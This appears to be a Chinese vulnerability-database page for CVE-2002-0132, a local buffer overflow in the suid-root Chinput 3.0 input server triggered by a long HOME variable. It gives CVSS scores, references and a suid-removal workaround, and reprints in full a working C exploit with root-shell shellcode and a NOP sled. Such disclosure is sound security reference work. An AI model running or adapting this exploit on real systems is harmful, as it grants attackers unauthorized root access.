CVE-2002-0132
CVSS7.2
发布时间 :2002-03-25 00:00:00
修订时间 :2008-09-10 20:00:34
NMCOES    

[原文]Buffer overflow in Chinput 3.0 allows local users to execute arbitrary code via a long HOME environment variable.


[CNNVD]Chinput环境变量缓冲区溢出漏洞(CNNVD-200203-063)

        
        Chinput是一个中文输入服务器,在很多的Unix/Linux发行版中都被使用。
        Chinput在处理环境变量时存在缓冲区溢出漏洞,可以使本地攻击者得到root权限。
        当Chinput处理一个超长的HOME环境变量时,会发生典型的缓冲区溢出。由于Chinput安装时一般设置了suid root属性,本地攻击者可以获取root权限。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0132
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0132
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-063
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/7911.php
(VENDOR_ADVISORY)  XF  chinput-long-env-bo(7911)
http://online.securityfocus.com/archive/1/250815
(VENDOR_ADVISORY)  BUGTRAQ  20020116 Chinput Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/3896
(UNKNOWN)  BID  3896

- 漏洞信息

Chinput环境变量缓冲区溢出漏洞
高危 边界条件错误
2002-03-25 00:00:00 2005-10-20 00:00:00
本地  
        
        Chinput是一个中文输入服务器,在很多的Unix/Linux发行版中都被使用。
        Chinput在处理环境变量时存在缓冲区溢出漏洞,可以使本地攻击者得到root权限。
        当Chinput处理一个超长的HOME环境变量时,会发生典型的缓冲区溢出。由于Chinput安装时一般设置了suid root属性,本地攻击者可以获取root权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时去掉chinput的suid位。
        厂商补丁:
        Chinput
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.opencjk.org/~yumj/project-chinput.html

- 漏洞信息 (21231)

Chinput 3.0 Environment Variable Buffer Overflow Vulnerability (EDBID:21231)
linux local
2002-01-16 Verified
0 xperc
N/A [点击下载]
source: http://www.securityfocus.com/bid/3896/info

Chinput is an input server designed for Chinese characters. It is available on Linux and other Unix based systems. Chinput appears to be installed suid root by default.

A vulnerability exists in Chinput. A local user with an extremely long HOME environment variable may cause a buffer to overflow. If successfully exploited, this can overwrite the instruction pointer, and lead to the execution of arbitrary code as root. 

/* local exploit for Chinput 3.0
 * .. tested in TurboLinux 6.5 with kernel 2.2.18
 *
 * Usage: $gcc chinput_exp.c
 *        $./a.out
 *        bash-2.04$ /usr/bin/chinput
 *
 *                       by xperc@hotmail.com
 *                               2002/1/16
 */

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define OFS 0x1f0

unsigned long get_esp()
{
    __asm__("mov %esp,%eax");
}

char *shellcode=
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"    /*
setuid=0 */
    "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"    /*
setgid=0 */
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b"
    "\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56"
    "\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
    "\xff\xff\xff/bin/sh";


char s[512];
char *s1;

int main()
{
	strcpy(s,"HOME=");
	s1=s+5;
	while(s1<s+260+5-strlen(shellcode))
	    *(s1++)=NOP;

	while(*shellcode)
            *(s1++)=*(shellcode++);
        *((unsigned long *)s1)=get_esp()-OFS;
	printf("Jump to: %p\n",*((long *)s1));
	s1+=4;
	*s1=0;
	putenv(s);
	system("bash");
}

		

- 漏洞信息

14253
Chinput HOME Environment Variable Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-01-16 Unknow
2002-01-16 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Chinput Environment Variable Buffer Overflow Vulnerability
Boundary Condition Error 3896
No Yes
2002-01-16 12:00:00 2009-07-11 09:56:00
Published by xperc <xperc@hotmail.com> to the Bugtraq mailing list.

- 受影响的程序版本

Chinput Chinput 3.0

- 漏洞讨论

Chinput is an input server designed for Chinese characters. It is available on Linux and other Unix based systems. Chinput appears to be installed suid root by default.

A vulnerability exists in Chinput. A local user with an extremely long HOME environment variable may cause a buffer to overflow. If successfully exploited, this can overwrite the instruction pointer, and lead to the execution of arbitrary code as root.

- 漏洞利用

An exploit has been provided by xperc &lt;xperc@hotmail.com&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站